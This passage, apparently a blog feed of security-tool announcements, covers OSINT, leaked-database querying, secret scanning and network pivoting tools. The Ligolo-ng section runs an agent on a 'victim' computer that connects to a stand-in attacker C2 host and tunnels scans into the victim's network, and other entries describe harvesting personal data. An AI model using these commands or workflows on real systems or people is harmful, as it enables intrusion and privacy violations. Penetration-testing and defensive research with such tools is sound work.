    DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes

    By: Zion3R


    DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.


    Prerequisites

    Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.

    Environment Setup

    1. Clone the Repository

    First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:

    git clone https://github.com/luijait/DarkGPT.git cd DarkGPT

    1. Configure Environment Variables

    You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:

    DEHASHED_API_KEY="your_dehashed_api_key_here"

    1. Install Dependencies

    This project requires certain Python packages to run. Install them by running the following command:

    pip install -r requirements.txt 4. Then Run the project: python3 main.py



    Mhf - Mobile Helper Framework - A Tool That Automates The Process Of Identifying The Framework/Technology Used To Create A Mobile Application

    By: Zion3R


    Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding sensitive information or provides suggestions for working with the identified platform.


    How work?

    The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files.


    Example

    Cordova

    Search files:

    index.html
    cordova.js
    cordova_plugins.js

    React Native Android & iOS

    Search file

    Andorid files:

    libreactnativejni.so
    index.android.bundle

    iOS files:

    main.jsbundle

    Installation

    ❗A minimum of Java 8 is required to run Apktool.

    pip install -r requirements.txt


    Usage

    python3 mhf.py app.apk|ipa|aab


    Examples
    python3 mobile_helper_framework.py file.apk

    [+] App was written in React Native

    Do you want analizy the application (y/n) y

    Output directory already exists. Skipping decompilation.

    Beauty the react code? (y/n) n

    Search any info? (y/n) y

    ==>>Searching possible internal IPs in the file

    results.........

    ==>>Searching possible emails in the file

    results.........

    ==>>Searching possible interesting words in the file

    results.........

    ==>>Searching Private Keys in the file

    results.........

    ==>>Searching high confidential secrets

    results.........

    ==>>Searching possible sensitive URLs in js files

    results.........

    ==>>Searching possible endpoints in js files results.........

    Features

    This tool uses Apktool for decompilation of Android applications.

    This tool renames the .ipa file of iOS applications to .zip and extracts the contents.

    Feature Note Cordova React Native Native JavaScript Flutter Xamarin
    JavaScript beautifier Use this for the first few occasions to see better results. βœ… βœ… βœ…
    Identifying multiple sensitive information IPs, Private Keys, API Keys, Emails, URLs βœ… βœ… βœ… ❌
    Cryptographic Functions βœ… βœ… βœ… ❌ ❌
    Endpoint extractor βœ… βœ… βœ… ❌ ❌
    Automatically detects if the code has been beautified. ❌ ❌ ❌
    Extracts automatically apk of devices/emulator ❌ ❌ ❌ ❌ ❌
    Patching apk βœ…
    Extract an APK from a bundle file. βœ… βœ… βœ… βœ… βœ…
    Detect if JS files are encrypted ❌ ❌
    Detect if the resources are compressed. ❌ Hermesβœ… ❌ ❌ XALZβœ…
    Detect if the app is split ❌ ❌ ❌ ❌ ❌

    What is patching apk: This tool uses Reflutter, a framework that assists with reverse engineering of Flutter apps using a patched version of the Flutter library.

    More information: https://github.com/Impact-I/reFlutter


    Split APKs is a technique used by Android to reduce the size of an application and allow users to download and use only the necessary parts of the application.

    Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application such as resources, code libraries, assets, and configuration files.

    adb shell pm path com.package
    package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/base.apk
    package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.arm64_v8a.apk
    package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.en.apk
    package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.xxhdpi.apk

    For example, in Flutter if the application is a Split it's necessary patch split_config.arm64_v8a.apk, this file contains libflutter.so


    Credits
    • This tool use a secrets-patterns-db repositorty created by mazen160
    • This tool use a regular expresion created by Gerben_Javado for extract endpoints
    • This tools use reflutter for flutter actions

    Changelog

    0.5
    • Public release
    • Bug fixes

    0.4
    • Added plugins information in Cordova apps
    • Added Xamarin actions
    • Added NativeScript actions
    • Bug fixes

    0.3
    • Added NativeScript app detection
    • Added signing option when the apk extracted of aab file is not signed

    0.2
    • Fixed issues with commands on Linux.

    0.1
    • Initial version release.

    License
    • This work is licensed under a Creative Commons Attribution 4.0 International License.

    Autors

    Cesar Calderon Marco Almaguer



    RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains

    By: Zion3R


    RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.


    Features
    • Automated scanning of domains and subdomains for exposed .git repositories.
    • Streamlines the detection of sensitive data exposures.
    • User-friendly command-line interface.
    • Ideal for security audits and Bug Bounty.

    Installation

    Clone the repository and install the required dependencies:

    git clone https://github.com/YourUsername/RepoReaper.git
    cd RepoReaper
    pip install -r requirements.txt
    chmod +x RepoReaper.py

    Usage

    RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.

    To start RepoReaper, simply run:

    ./RepoReaper.py
    or
    python3 RepoReaper.py

    Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains: Enter the path of the file containing domains

    Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:

    example.com
    subdomain.example.com
    anotherdomain.com

    RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.Β 


    Disclaimer

    This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.



    SwaggerSpy - Automated OSINT On SwaggerHub

    By: Zion3R


    SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.


    What is Swagger?

    Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.


    About SwaggerHub

    SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.


    Why OSINT on SwaggerHub?

    Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:

    1. Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.

    2. Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.

    3. Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.

    4. Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.

    5. Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.

    6. Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.

    By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.


    How SwaggerSpy Works

    SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.


    Getting Started

    To use SwaggerSpy, follow these steps:

    1. Installation: Clone the SwaggerSpy repository and install the required dependencies.
    git clone https://github.com/UndeadSec/SwaggerSpy.git
    cd SwaggerSpy
    pip install -r requirements.txt
    1. Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
    python swaggerspy.py searchterm
    1. Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.

    Disclaimer

    SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.


    Contribution

    Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.


    About the Author

    SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)

    I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.


    TODO

    Regular Expressions Enhancement
    • [ ] Review and improve existing regular expressions.
    • [ ] Ensure that regular expressions adhere to best practices.
    • [ ] Check for any potential optimizations in the regex patterns.
    • [ ] Test regular expressions with various input scenarios for accuracy.
    • [ ] Document any complex or non-trivial regex patterns for better understanding.
    • [ ] Explore opportunities to modularize or break down complex patterns.
    • [ ] Verify the regular expressions against the latest specifications or requirements.
    • [ ] Update documentation to reflect any changes made to the regular expressions.

    License

    SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.


    Thanks

    Special thanks to @Liodeus for providing project inspiration through swaggerHole.



    Argus - A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions

    By: Zion3R

    This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.

    Visit our website - secureci.org for more information.


    Features

    • Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.

    • Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.

    Usage

    This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.

    python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]

    Parameters:

    • --mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
    • --url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
    • --output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
    • --config: The config file. This parameter is optional.
    • --verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
    • --branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
    • --workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.

    Example:

    To use this script to interact with a GitHub repo, you might run a command like the following:

    python argus.py --mode repo --url https://github.com/username/repo.git --branch master

    This would run the script in repo mode on the master branch of the specified repository.

    How to use

    Argus can be run inside a docker container. To do so, follow the steps:

    • Install docker and docker-compose
      • apt-get -y install docker.io docker-compose
    • Clone the release branch of this repo
      • git clone <>
    • Build the docker container
      • docker-compose build
    • Now you can run argus. Example run:
      • docker-compose run argus --mode {mode} --url {url to target repo}
    • Results will be available inside the results folder

    Viewing SARIF Results

    You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.

    1. Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.

    2. VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.

    Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.

    Troubleshooting

    If there is an issue with needing the Github authorization for running, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all the requests made to Github. Note, we do not store this information anywhere, neither create any thing in the Github account - we only use this for cloning the repositories.

    Contributions

    Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!

    Cite Argus

    If you use Argus in your research, please cite our paper:

      @inproceedings{muralee2023Argus,
    title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
    author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
    A. Kapravelos, A. Machiry},
    booktitle={32st USENIX Security Symposium (USENIX Security 23)},
    year={2023},
    }


    Nemesis - An Offensive Data Enrichment Pipeline

    By: Zion3R


    Nemesis is an offensive data enrichment pipeline and operator support system.

    Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

    Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


    Setup / Installation

    See the setup instructions.

    Contributing / Development Environment Setup

    See development.md

    Further Reading

    Post Name Publication Date Link
    Hacking With Your Nemesis Aug 9, 2023 https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
    Challenges In Post-Exploitation Workflows Aug 2, 2023 https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
    On (Structured) Data Jul 26, 2023 https://posts.specterops.io/on-structured-data-707b7d9876c6

    Acknowledgments

    Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!

    We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



    BucketLoot - An Automated S3-compatible Bucket Inspector

    By: Zion3R


    BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

    The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

    BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

    Features

    Secret Scanning

    Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

    Sensitive File Checks

    Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

    Dig Mode

    Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

    Asset Extraction

    Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

    Searching

    The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

    To know more about our Attack Surface Management platform, check out NVADR.



    Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

    By: Zion3R


    Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


    Features

    • Tun interface (No more SOCKS!)
    • Simple UI with agent selection and network information
    • Easy to use and setup
    • Automatic certificate configuration with Let's Encrypt
    • Performant (Multiplexing)
    • Does not require high privileges
    • Socket listening/binding on the agent
    • Multiple platforms supported for the agent

    How is this different from Ligolo/Chisel/Meterpreter... ?

    Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

    When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

    As an example, for a TCP connection:

    • SYN are translated to connect() on remote
    • SYN-ACK is sent back if connect() succeed
    • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
    • Nothing is sent if timeout

    This allows running tools like nmap without the use of proxychains (simpler and faster).

    Building & Usage

    Precompiled binaries

    Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

    Building Ligolo-ng

    Building ligolo-ng (Go >= 1.20 is required):

    $ go build -o agent cmd/agent/main.go
    $ go build -o proxy cmd/proxy/main.go
    # Build for Windows
    $ GOOS=windows go build -o agent.exe cmd/agent/main.go
    $ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

    Setup Ligolo-ng

    Linux

    When using Linux, you need to create a tun interface on the Proxy Server (C2):

    $ sudo ip tuntap add user [your_username] mode tun ligolo
    $ sudo ip link set ligolo up

    Windows

    You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

    Running Ligolo-ng proxy server

    Start the proxy server on your Command and Control (C2) server (default port 11601):

    $ ./proxy -h # Help options
    $ ./proxy -autocert # Automatically request LetsEncrypt certificates

    TLS Options

    Using Let's Encrypt Autocert

    When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

    Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

    Using your own TLS certificates

    If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

    Automatic self-signed certificates (NOT RECOMMENDED)

    The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

    The -ignore-cert option needs to be used with the agent.

    Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

    Using Ligolo-ng

    Start the agent on your target (victim) computer (no privileges are required!):

    $ ./agent -connect attacker_c2_server.com:11601

    If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

    A session should appear on the proxy server.

    INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

    Use the session command to select the agent.

    ligolo-ng Β» session 
    ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

    Display the network configuration of the agent using the ifconfig command:

    [Agent : nchatelain@nworkstation] Β» ifconfig 
    [...]
    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
    β”‚ Interface 3 β”‚
    β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
    β”‚ Name β”‚ wlp3s0 β”‚
    β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe β”‚
    β”‚ MTU β”‚ 1500 β”‚
    β”‚ Flags β”‚ up|broadcast|multicast β”‚
    β”‚ IPv4 Address β”‚ 192.168.0.30/24 β”‚
    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

    Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

    Linux:

    $ sudo ip route add 192.168.0.0/24 dev ligolo

    Windows:

    > netsh int ipv4 show interfaces

    Idx MΓ©t MTU Γ‰tat Nom
    --- ---------- ---------- ------------ ---------------------------
    25 5 65535 connected ligolo

    > route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

    Start the tunnel on the proxy:

    [Agent : nchatelain@nworkstation] Β» start
    [Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

    You can now access the 192.168.0.0/24 agent network from the proxy server.

    $ nmap 192.168.0.0/24 -v -sV -n
    [...]
    $ rdesktop 192.168.0.123
    [...]

    Agent Binding/Listening

    You can listen to ports on the agent and redirect connections to your control/proxy server.

    In a ligolo session, use the listener_add command.

    The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

    [Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
    INFO[1208] Listener created on remote agent!

    On the proxy:

    $ nc -lvp 4321

    When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

    This is very useful when using reverse tcp/udp payloads.

    You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

    [Agent : nchatelain@nworkstation] Β» listener_list 
    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
    β”‚ Active listeners β”‚
    β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€ ───────────────────┬─────────────────────────
    β”‚ # β”‚ AGENT β”‚ AGENT LISTENER ADDRESS β”‚ PROXY REDIRECT ADDRESS β”‚
    β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€& #9508;
    β”‚ 0 β”‚ nchatelain@nworkstation β”‚ 0.0.0.0:1234 β”‚ 127.0.0.1:4321 β”‚
    β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

    [Agent : nchatelain@nworkstation] Β» listener_stop 0
    INFO[1505] Listener closed.

    Demo

    ligolo-ng_demo.mp4

    Does it require Administrator/root access ?

    On the agent side, no! Everything can be performed without administrative access.

    However, on your relay/proxy server, you need to be able to create a tun interface.

    Supported protocols/packets

    • TCP
    • UDP
    • ICMP (echo requests)

    Performance

    You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

    $ iperf3 -c 10.10.0.1 -p 24483
    Connecting to host 10.10.0.1, port 24483
    [ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
    [ ID] Interval Transfer Bitrate Retr Cwnd
    [ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
    [ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
    [ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
    [ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
    [ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
    [ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
    [ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
    [ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
    [ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
    [ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
    - - - - - - - - - - - - - - - - - - - - - - - - -
    [ ID] Interval Transfer Bitrate Retr
    [ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
    [ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

    Caveats

    Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

    When using nmap, you should use --unprivileged or -PE to avoid false positives.

    Todo

    • Implement other ICMP error messages (this will speed up UDP scans) ;
    • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
    • Add mTLS support.

    Credits

    • Nicolas Chatelain <nicolas -at- chatelain.me>


    Antisquat - Leverages AI Techniques Such As NLP, ChatGPT And More To Empower Detection Of Typosquatting And Phishing Domains

    By: Zion3R


    AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.


    How to use

    • Clone the project via git clone https://github.com/redhuntlabs/antisquat.
    • Install all dependencies by typing pip install -r requirements.txt.
    • Get a ChatGPT API key at https://platform.openai.com/account/api-keys
    • Create a file named .openai-key and paste your chatgpt api key in there.
    • (Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your godaddy api key in there.
    • Create a file named β€˜domains.txt’. Type in a line-separated list of domains you’d like to scan.
    • (Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you’d like to ignore. Regular expressions are supported.
    • Run antisquat using python3.8 antisquat.py domains.txt

    Examples:

    Let’s say you’d like to run antisquat on "flipkart.com".

    Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.

    AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.

    Test case:

    A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py

    Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.

    If you'd like to know more about the tool, make sure to check out our blog.

    Acknowledgements

    To know more about our Attack Surface Management platform, check out NVADR.



    Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

    By: Zion3R


    Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


    Extracted Details:

    Uscrapper extracts the following details from the provided website:

    • Email Addresses: Displays email addresses found on the website.
    • Social Media Links: Displays links to various social media platforms found on the website.
    • Author Names: Displays the names of authors associated with the website.
    • Geolocations: Displays geolocation information associated with the website.
    • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.

    Whats New?:

    Uscrapper 2.0:

    • Introduced multiple modules to bypass anti-webscrapping techniques.
    • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
    • Implemented Multithreading to make these processes faster.

    Installation Steps:

    git clone https://github.com/z0m31en7/Uscrapper.git
    cd Uscrapper/install/ 
    chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

    Usage:

    To run Uscrapper, use the following command-line syntax:

    python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


    Arguments:

    • -h, --help: Show the help message and exit.
    • -u URL, --url URL: Specify the URL of the website to extract details from.
    • -c INT, --crawl INT: Specify the number of links to crawl
    • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
    • -O, --generate-report: Generate a report file containing the extracted details.
    • -ns, --nonstrict: Display non-strict usernames during extraction.

    Note:

    • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

    • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

    • To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.

    Contribution:

    Want a new feature to be added?

    • Make a pull request with all the necessary details and it will be merged after a review.
    • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


    Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

    By: Zion3R


    gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

    The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active Directory that offer GSSAPI authentication over SSH.

